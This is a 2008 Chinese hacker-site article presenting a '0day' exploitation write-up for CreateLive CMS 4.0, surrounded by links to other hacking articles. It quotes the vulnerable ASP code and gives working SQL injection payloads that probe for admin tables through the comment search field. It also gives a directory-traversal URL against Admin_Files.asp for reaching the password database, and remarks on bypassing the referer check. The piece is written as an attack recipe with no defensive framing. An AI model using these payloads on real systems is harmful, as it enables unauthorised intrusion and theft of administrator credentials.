·	完美空间提供500M免费AS	04-10	·	企业安全之YY内网准入以	04-09
·	企业安全之意识与策略	04-09	·	剑走偏锋:IIS漏洞利用	04-09
·	我来免费网提供100M免费	04-09	·	1122mb.com提供20G超大免	04-08
·	映像劫持与反劫持技术	04-07	·	让所有"暴力删除工具"无	04-07
·	入侵88red系统的详细过程	04-07	·	Sql Injection脚本注入终	04-07
·	vbs+delphi 反弹后门生成	04-07	·	飞讯网提供100MB免费PHP	04-07
·	突破SQL注入攻击时输入框	04-04	·	结合内核和病毒技术的最	04-04
·	Real Player rmoc3260.d	04-04	·	亿万网络今月最后为您提	04-04
·	php+mysql 5 sql inject	04-03	·	Real Player rmoc3260.d	04-03
·	oblog文件下载漏洞	04-03	·	免费啦提供1G-2G免费全能	04-03
·	完全解析网页后门和挂马	04-02	·	一句话开3389（只测试过	04-02
·	萧萧免费空间网提供100M	04-02	·	谷道免费空间网提供1G免	04-01
·	从本地入手解决双线路由	03-31	·	sablog 1.6 多个跨站漏洞	03-31
·	富文本编辑器的跨站脚本	03-31	·	Cookie注入是怎样产生的	03-31

[推荐]CreateLive CMS Version 4.0 0day漏洞利用

荐 ★★★★★

CreateLive CMS Version 4.0 0day漏洞利用

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-3-21 9:15:11

漏洞之一

来源kingcms\User\User_Comment.asp CommentID

以下是引用片段：
sub SaveModify()

……
CommentID=Trim(Request("CommentID")) '注入
……
if CommentID="" then
FoundErr=True
ErrMsg=ErrMsg & "<br /><li>请指定评论ID</li>"
Exit sub
end if
……
if FoundErr=True then exit sub
sql="Select * from Cl_Comment where ChannelID="&ChannelID&" and UserID="&UserID&" and CommentID=" & CommentID '注入
Set rsComment=Server.CreateObject("Adodb.RecordSet")
rsComment.Open sql,Conn,1,3
if rsComment.Bof or rsComment.EOF then
FoundErr=True
ErrMsg=ErrMsg & "<br /><li>找不到指定的评论！</li>"
else
……

没有任何过滤……
当然新问题也来了
来源 kingcms\User\inc\Cl_ClsSysTem.asp
'判断提交信息是否来自外部
Public Function ChkIsOuter()
Dim server_v1,server_v2
ChkIsOuter=True
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
If Mid(server_v1,8,len(server_v2))=server_v2 Then ChkIsOuter=False
End Function

一切的工具都不能利用，只能去输入一些信息然后post。NB～◎！＃￥￥＃％％
不过在几秒我又找到一个（因为文章就要写不下去了……）

漏洞之二

大部分网站都要会员审核，不能直接进入。是个搜索漏洞～它的真面目
http://127.0.0.1/User/User_Comment.asp?ChannelID=1&SearchContent=11&Query=查+询

看看他里面怎么写的
来源 kingcms\User\User_Comment.asp

以下是引用片段：
SearchContent = Trim(request("SearchContent"))
……
Sub main()
……
if SearchContent<>"" then
strSql2=strSql2 & " and M.CommentContent like '%" & SearchContent & "%' "

构造下
%'and (select count(*) from admin)>0 and '%'='
%'and (select count(*) from cl_admin)>0 and '%'='

然后在这里输入

第一句是问他有没有admin这个表它的回答

第二句是问他有没有cl_admin这个表,因为cl_admin存在，所以它的回答是

相信某些人都明白了`只能靠手……

漏洞之三

（要发文章的权限，而且你要把外部提交检测绕过……）也许你等不及了，无聊中准备结束时～
凌晨2008年2月4日 04:41:07……
用会员登陆后，然后访问/Admin/Admin_Files.asp?action=Main&FileType=select&ChannelID=2&ThisDir=../../Data

你会发现/*因为我用admin登陆的，所以……*/得到密码多么容易
Admin\Admin_Files.asp
if ThisDir<>"" then
ThisDir=Replace(ThisDir & "/","//","/")

手抽筋了，不写了～

漏洞之四

来源与一个防注文件，因为log和admin不在一个数据库，没利用价值……

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章： Cmsez(随易)全站系统 0day

下一篇文章： ShopEx PHP远程包含漏洞

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

新云CMS Online.asp页面过滤不严	02-26
对网软网上购物系统的漏洞分析	01-09
测试SQL防注入脚本	12-21
Google Xss又出跨站新漏洞	11-06
一次简单的html injection导致的	11-06
风讯、科讯漏洞利用	11-01
Adobe pdf reader URI利用方式浅	10-23
超星阅览器的最新0DAY	10-19
运用SQL Injection做数据库渗透的	09-22
sa-blog 0day	09-22
HTML注入的一些简单想法	09-10
网站登陆接口的攻与防	09-04